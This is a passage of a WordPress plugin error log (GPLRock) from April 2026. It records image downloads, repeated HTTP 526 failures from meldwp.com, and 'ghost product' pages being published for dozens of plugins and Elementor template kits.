13:03:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: testimonial-awesome-pro-testimonial-plugin-wordpress-slider [05-Apr-2026 13:03:12 UTC] GPLRock: Image downloaded successfully for product magazinify-news-addon-for-elementor-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f48e2e28.webp [05-Apr-2026 13:03:12 UTC] GPLRock: Using pre-downloaded image for product magazinify-news-addon-for-elementor-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f48e2e28.webp [05-Apr-2026 13:03:12 UTC] GPLRock: Ghost product published with image - Product ID: magazinify-news-addon-for-elementor-page-builder [05-Apr-2026 13:03:12 UTC] GPLRock: Image download failed for product woocommerce-product-dealers-retailers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:14 UTC] GPLRock: Image download failed for product woocommerce-product-dealers-retailers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-dealers--retailers-26976.webp for product woocommerce-product-dealers-retailers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:03:16 UTC] GPLRock: Image download failed for product woocommerce-product-dealers-retailers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:19 UTC] GPLRock: Image download failed for product woocommerce-product-dealers-retailers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:03:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-dealers--retailers-26976.webp for product woocommerce-product-dealers-retailers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:03:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-dealers-retailers. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-dealers--retailers-26976.webp [05-Apr-2026 13:03:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-dealers-retailers [05-Apr-2026 13:04:06 UTC] GPLRock: Image downloaded successfully for product stractura-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecf59526.webp [05-Apr-2026 13:04:06 UTC] GPLRock: Using pre-downloaded image for product stractura-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecf59526.webp [05-Apr-2026 13:04:06 UTC] GPLRock: Ghost product published with image - Product ID: stractura-construction-elementor-template-kit [05-Apr-2026 13:04:07 UTC] GPLRock: Image downloaded successfully for product strack-biz-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68b09dda.webp [05-Apr-2026 13:04:07 UTC] GPLRock: Using pre-downloaded image for product strack-biz-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68b09dda.webp [05-Apr-2026 13:04:07 UTC] GPLRock: Ghost product published with image - Product ID: strack-biz-elementor-template-kit [05-Apr-2026 13:04:09 UTC] GPLRock: Image downloaded successfully for product stellar-hosting-cloud-provider-wordpress-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-560aa070.webp [05-Apr-2026 13:04:09 UTC] GPLRock: Using pre-downloaded image for product stellar-hosting-cloud-provider-wordpress-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-560aa070.webp [05-Apr-2026 13:04:09 UTC] GPLRock: Ghost product published with image - Product ID: stellar-hosting-cloud-provider-wordpress-elementor-template-kit [05-Apr-2026 13:04:10 UTC] GPLRock: Image downloaded successfully for product statute-law-firm-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90768256.webp [05-Apr-2026 13:04:10 UTC] GPLRock: Using pre-downloaded image for product statute-law-firm-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90768256.webp [05-Apr-2026 13:04:10 UTC] GPLRock: Ghost product published with image - Product ID: statute-law-firm-attorney-elementor-template-kit [05-Apr-2026 13:04:11 UTC] GPLRock: Image downloaded successfully for product socialy-social-media-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e81edf4d.webp [05-Apr-2026 13:04:12 UTC] GPLRock: Using pre-downloaded image for product socialy-social-media-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e81edf4d.webp [05-Apr-2026 13:04:12 UTC] GPLRock: Ghost product published with image - Product ID: socialy-social-media-marketing-agency-elementor-template-kit [05-Apr-2026 13:04:13 UTC] GPLRock: Image downloaded successfully for product sociabuff-social-media-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21f38c12.webp [05-Apr-2026 13:04:13 UTC] GPLRock: Using pre-downloaded image for product sociabuff-social-media-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-21f38c12.webp [05-Apr-2026 13:04:13 UTC] GPLRock: Ghost product published with image - Product ID: sociabuff-social-media-digital-agency-elementor-template-kit [05-Apr-2026 13:04:14 UTC] GPLRock: Image downloaded successfully for product sipu-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3715b106.webp [05-Apr-2026 13:04:14 UTC] GPLRock: Using pre-downloaded image for product sipu-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3715b106.webp [05-Apr-2026 13:04:14 UTC] GPLRock: Ghost product published with image - Product ID: sipu-creative-portfolio-elementor-template-kit [05-Apr-2026 13:04:16 UTC] GPLRock: Image downloaded successfully for product sinema-film-maker-movie-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3281c649.webp [05-Apr-2026 13:04:16 UTC] GPLRock: Using pre-downloaded image for product sinema-film-maker-movie-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3281c649.webp [05-Apr-2026 13:04:16 UTC] GPLRock: Ghost product published with image - Product ID: sinema-film-maker-movie-studio-elementor-template-kit [05-Apr-2026 13:04:17 UTC] GPLRock: Image downloaded successfully for product silp-real-estate-architecture-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-868b0b8c.webp [05-Apr-2026 13:04:17 UTC] GPLRock: Using pre-downloaded image for product silp-real-estate-architecture-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-868b0b8c.webp [05-Apr-2026 13:04:17 UTC] GPLRock: Ghost product published with image - Product ID: silp-real-estate-architecture-template-kit [05-Apr-2026 13:04:19 UTC] GPLRock: Image downloaded successfully for product silion-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2d699c6.webp [05-Apr-2026 13:04:19 UTC] GPLRock: Using pre-downloaded image for product silion-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2d699c6.webp [05-Apr-2026 13:04:19 UTC] GPLRock: Ghost product published with image - Product ID: silion-digital-marketing-elementor-template-kit [05-Apr-2026 13:06:04 UTC] GPLRock: Image downloaded successfully for product carddio-card-payment-online-banking-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7845b83.webp [05-Apr-2026 13:06:04 UTC] GPLRock: Using pre-downloaded image for product carddio-card-payment-online-banking-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7845b83.webp [05-Apr-2026 13:06:04 UTC] GPLRock: Ghost product published with image - Product ID: carddio-card-payment-online-banking-elementor-template-kit [05-Apr-2026 13:06:05 UTC] GPLRock: Image downloaded successfully for product carcare-auto-service-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6eba2ab7.webp [05-Apr-2026 13:06:05 UTC] GPLRock: Using pre-downloaded image for product carcare-auto-service-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6eba2ab7.webp [05-Apr-2026 13:06:05 UTC] GPLRock: Ghost product published with image - Product ID: carcare-auto-service-repair-elementor-template-kit [05-Apr-2026 13:06:08 UTC] GPLRock: Image downloaded successfully for product busy-modern-corporate-business-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a14745f2.webp [05-Apr-2026 13:06:08 UTC] GPLRock: Using pre-downloaded image for product busy-modern-corporate-business-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a14745f2.webp [05-Apr-2026 13:06:08 UTC] GPLRock: Ghost product published with image - Product ID: busy-modern-corporate-business-portfolio-elementor-template-kit [05-Apr-2026 13:06:09 UTC] GPLRock: Image downloaded successfully for product bustic-tech-software-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c90b1dd6.webp [05-Apr-2026 13:06:10 UTC] GPLRock: Using pre-downloaded image for product bustic-tech-software-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c90b1dd6.webp [05-Apr-2026 13:06:10 UTC] GPLRock: Ghost product published with image - Product ID: bustic-tech-software-company-elementor-template-kit [05-Apr-2026 13:06:11 UTC] GPLRock: Image downloaded successfully for product buruh-laser-cutting-engineering-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecdf24ad.webp [05-Apr-2026 13:06:11 UTC] GPLRock: Using pre-downloaded image for product buruh-laser-cutting-engineering-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecdf24ad.webp [05-Apr-2026 13:06:11 UTC] GPLRock: Ghost product published with image - Product ID: buruh-laser-cutting-engineering-company-elementor-template-kit [05-Apr-2026 13:06:12 UTC] GPLRock: Image downloaded successfully for product burto-saas-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a633587.webp [05-Apr-2026 13:06:12 UTC] GPLRock: Using pre-downloaded image for product burto-saas-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a633587.webp [05-Apr-2026 13:06:12 UTC] GPLRock: Ghost product published with image - Product ID: burto-saas-digital-agency-elementor-template-kit [05-Apr-2026 13:06:14 UTC] GPLRock: Image downloaded successfully for product burgos-street-food-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e393a29.jpg [05-Apr-2026 13:06:14 UTC] GPLRock: Using pre-downloaded image for product burgos-street-food-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e393a29.jpg [05-Apr-2026 13:06:14 UTC] GPLRock: Ghost product published with image - Product ID: burgos-street-food-elementor-template-kit [05-Apr-2026 13:06:15 UTC] GPLRock: Image downloaded successfully for product burger-food-truck-popup-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e277d3db.webp [05-Apr-2026 13:06:15 UTC] GPLRock: Using pre-downloaded image for product burger-food-truck-popup-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e277d3db.webp [05-Apr-2026 13:06:15 UTC] GPLRock: Ghost product published with image - Product ID: burger-food-truck-popup-restaurant-elementor-template-kit [05-Apr-2026 13:06:16 UTC] GPLRock: Image downloaded successfully for product bumbo-business-startup-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-428cb510.webp [05-Apr-2026 13:06:17 UTC] GPLRock: Using pre-downloaded image for product bumbo-business-startup-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-428cb510.webp [05-Apr-2026 13:06:17 UTC] GPLRock: Ghost product published with image - Product ID: bumbo-business-startup-portfolio-elementor-template-kit [05-Apr-2026 13:06:18 UTC] GPLRock: Image downloaded successfully for product bulter-clean-construction-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383bdd27.webp [05-Apr-2026 13:06:18 UTC] GPLRock: Using pre-downloaded image for product bulter-clean-construction-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383bdd27.webp [05-Apr-2026 13:06:18 UTC] GPLRock: Ghost product published with image - Product ID: bulter-clean-construction-template-kit [05-Apr-2026 13:08:09 UTC] GPLRock: Image downloaded successfully for product oneprint-printing-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2c6f913.jpg [05-Apr-2026 13:08:09 UTC] GPLRock: Using pre-downloaded image for product oneprint-printing-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f2c6f913.jpg [05-Apr-2026 13:08:09 UTC] GPLRock: Ghost product published with image - Product ID: oneprint-printing-services-company-elementor-template-kit [05-Apr-2026 13:08:10 UTC] GPLRock: Image downloaded successfully for product ogena-minimal-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-922484c9.webp [05-Apr-2026 13:08:10 UTC] GPLRock: Using pre-downloaded image for product ogena-minimal-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-922484c9.webp [05-Apr-2026 13:08:10 UTC] GPLRock: Ghost product published with image - Product ID: ogena-minimal-elementor-template-kit [05-Apr-2026 13:08:12 UTC] GPLRock: Image downloaded successfully for product noxious-esport-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d38b255e.webp [05-Apr-2026 13:08:12 UTC] GPLRock: Using pre-downloaded image for product noxious-esport-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d38b255e.webp [05-Apr-2026 13:08:12 UTC] GPLRock: Ghost product published with image - Product ID: noxious-esport-gaming-elementor-template-kit [05-Apr-2026 13:08:14 UTC] GPLRock: Image downloaded successfully for product novo-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb3b8de1.webp [05-Apr-2026 13:08:14 UTC] GPLRock: Using pre-downloaded image for product novo-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb3b8de1.webp [05-Apr-2026 13:08:14 UTC] GPLRock: Ghost product published with image - Product ID: novo-photography-elementor-template-kit [05-Apr-2026 13:08:15 UTC] GPLRock: Image downloaded successfully for product novio-ecology-environmental-non-profit-organization-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a45f91f8.webp [05-Apr-2026 13:08:15 UTC] GPLRock: Using pre-downloaded image for product novio-ecology-environmental-non-profit-organization-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a45f91f8.webp [05-Apr-2026 13:08:15 UTC] GPLRock: Ghost product published with image - Product ID: novio-ecology-environmental-non-profit-organization-template-kit [05-Apr-2026 13:08:17 UTC] GPLRock: Image downloaded successfully for product notariz-notary-public-legal-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84607832.jpg [05-Apr-2026 13:08:17 UTC] GPLRock: Using pre-downloaded image for product notariz-notary-public-legal-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84607832.jpg [05-Apr-2026 13:08:17 UTC] GPLRock: Ghost product published with image - Product ID: notariz-notary-public-legal-services-elementor-template-kit [05-Apr-2026 13:08:18 UTC] GPLRock: Image downloaded successfully for product noobz-e-sports-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9c5b448.webp [05-Apr-2026 13:08:18 UTC] GPLRock: Using pre-downloaded image for product noobz-e-sports-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d9c5b448.webp [05-Apr-2026 13:08:18 UTC] GPLRock: Ghost product published with image - Product ID: noobz-e-sports-elementor-template-kit [05-Apr-2026 13:08:20 UTC] GPLRock: Image downloaded successfully for product nomic-corporate-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27a9d186.webp [05-Apr-2026 13:08:20 UTC] GPLRock: Using pre-downloaded image for product nomic-corporate-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-27a9d186.webp [05-Apr-2026 13:08:20 UTC] GPLRock: Ghost product published with image - Product ID: nomic-corporate-business-elementor-template-kit [05-Apr-2026 13:08:22 UTC] GPLRock: Image downloaded successfully for product noiz-audio-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e33dbb7.jpg [05-Apr-2026 13:08:22 UTC] GPLRock: Using pre-downloaded image for product noiz-audio-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8e33dbb7.jpg [05-Apr-2026 13:08:22 UTC] GPLRock: Ghost product published with image - Product ID: noiz-audio-store-woocommerce-elementor-template-kit [05-Apr-2026 13:08:23 UTC] GPLRock: Image downloaded successfully for product nirmala-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c22638d4.webp [05-Apr-2026 13:08:23 UTC] GPLRock: Using pre-downloaded image for product nirmala-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c22638d4.webp [05-Apr-2026 13:08:23 UTC] GPLRock: Ghost product published with image - Product ID: nirmala-digital-marketing-agency-elementor-template-kit [05-Apr-2026 13:10:07 UTC] GPLRock: Image download failed for product responsive-post-2-responsive-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:09 UTC] GPLRock: Image download failed for product responsive-post-2-responsive-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-post-2---responsive-wordpress-plugin-32709.webp for product responsive-post-2-responsive-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:11 UTC] GPLRock: Image download failed for product responsive-post-2-responsive-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:13 UTC] GPLRock: Image download failed for product responsive-post-2-responsive-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/responsive-post-2---responsive-wordpress-plugin-32709.webp for product responsive-post-2-responsive-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:15 UTC] GPLRock WARNING: Image download failed for product responsive-post-2-responsive-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/responsive-post-2---responsive-wordpress-plugin-32709.webp [05-Apr-2026 13:10:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: responsive-post-2-responsive-wordpress-plugin [05-Apr-2026 13:10:15 UTC] GPLRock: Image download failed for product bookly-packages-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:17 UTC] GPLRock: Image download failed for product bookly-packages-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-packages-add-on-13073.webp for product bookly-packages-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:20 UTC] GPLRock: Image download failed for product bookly-packages-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:22 UTC] GPLRock: Image download failed for product bookly-packages-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-packages-add-on-13073.webp for product bookly-packages-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:24 UTC] GPLRock WARNING: Image download failed for product bookly-packages-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-packages-add-on-13073.webp [05-Apr-2026 13:10:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-packages-add-on [05-Apr-2026 13:10:24 UTC] GPLRock: Image download failed for product grider-grid-of-content-and-products-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:26 UTC] GPLRock: Image download failed for product grider-grid-of-content-and-products-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grider--grid-of-content-and-products-for-elementor-19641.webp for product grider-grid-of-content-and-products-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:28 UTC] GPLRock: Image download failed for product grider-grid-of-content-and-products-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:30 UTC] GPLRock: Image download failed for product grider-grid-of-content-and-products-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grider--grid-of-content-and-products-for-elementor-19641.webp for product grider-grid-of-content-and-products-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:32 UTC] GPLRock WARNING: Image download failed for product grider-grid-of-content-and-products-for-elementor. URL: https://meldwp.com/wp-content/uploads/grider--grid-of-content-and-products-for-elementor-19641.webp [05-Apr-2026 13:10:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grider-grid-of-content-and-products-for-elementor [05-Apr-2026 13:10:33 UTC] GPLRock: Image download failed for product taskbot-a-freelancer-marketplace-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:35 UTC] GPLRock: Image download failed for product taskbot-a-freelancer-marketplace-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taskbot---a-freelancer-marketplace-wordpress-plugin-27522.webp for product taskbot-a-freelancer-marketplace-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:37 UTC] GPLRock: Image download failed for product taskbot-a-freelancer-marketplace-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:39 UTC] GPLRock: Image download failed for product taskbot-a-freelancer-marketplace-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/taskbot---a-freelancer-marketplace-wordpress-plugin-27522.webp for product taskbot-a-freelancer-marketplace-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:41 UTC] GPLRock WARNING: Image download failed for product taskbot-a-freelancer-marketplace-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/taskbot---a-freelancer-marketplace-wordpress-plugin-27522.webp [05-Apr-2026 13:10:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: taskbot-a-freelancer-marketplace-wordpress-plugin [05-Apr-2026 13:10:41 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:43 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-for-wordpress-10385.webp for product css3-vertical-web-pricing-tables-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:46 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:48 UTC] GPLRock: Image download failed for product css3-vertical-web-pricing-tables-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-for-wordpress-10385.webp for product css3-vertical-web-pricing-tables-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:50 UTC] GPLRock WARNING: Image download failed for product css3-vertical-web-pricing-tables-for-wordpress. URL: https://meldwp.com/wp-content/uploads/css3-vertical-web-pricing-tables-for-wordpress-10385.webp [05-Apr-2026 13:10:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: css3-vertical-web-pricing-tables-for-wordpress [05-Apr-2026 13:10:50 UTC] GPLRock: Image download failed for product modal-boxpopup-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:52 UTC] GPLRock: Image download failed for product modal-boxpopup-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modal-boxpopup-for-cornerstone-3654.webp for product modal-boxpopup-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:55 UTC] GPLRock: Image download failed for product modal-boxpopup-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:57 UTC] GPLRock: Image download failed for product modal-boxpopup-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:10:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modal-boxpopup-for-cornerstone-3654.webp for product modal-boxpopup-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:10:59 UTC] GPLRock WARNING: Image download failed for product modal-boxpopup-for-cornerstone. URL: https://meldwp.com/wp-content/uploads/modal-boxpopup-for-cornerstone-3654.webp [05-Apr-2026 13:10:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modal-boxpopup-for-cornerstone [05-Apr-2026 13:10:59 UTC] GPLRock: Image download failed for product contentoptin-wordpress-content-upgrade-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:01 UTC] GPLRock: Image download failed for product contentoptin-wordpress-content-upgrade-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contentoptin---wordpress-content-upgrade-plugin-8254.webp for product contentoptin-wordpress-content-upgrade-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:03 UTC] GPLRock: Image download failed for product contentoptin-wordpress-content-upgrade-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:05 UTC] GPLRock: Image download failed for product contentoptin-wordpress-content-upgrade-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contentoptin---wordpress-content-upgrade-plugin-8254.webp for product contentoptin-wordpress-content-upgrade-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:07 UTC] GPLRock WARNING: Image download failed for product contentoptin-wordpress-content-upgrade-plugin. URL: https://meldwp.com/wp-content/uploads/contentoptin---wordpress-content-upgrade-plugin-8254.webp [05-Apr-2026 13:11:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contentoptin-wordpress-content-upgrade-plugin [05-Apr-2026 13:11:08 UTC] GPLRock: Image download failed for product woocommerce-update-cart-item-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:10 UTC] GPLRock: Image 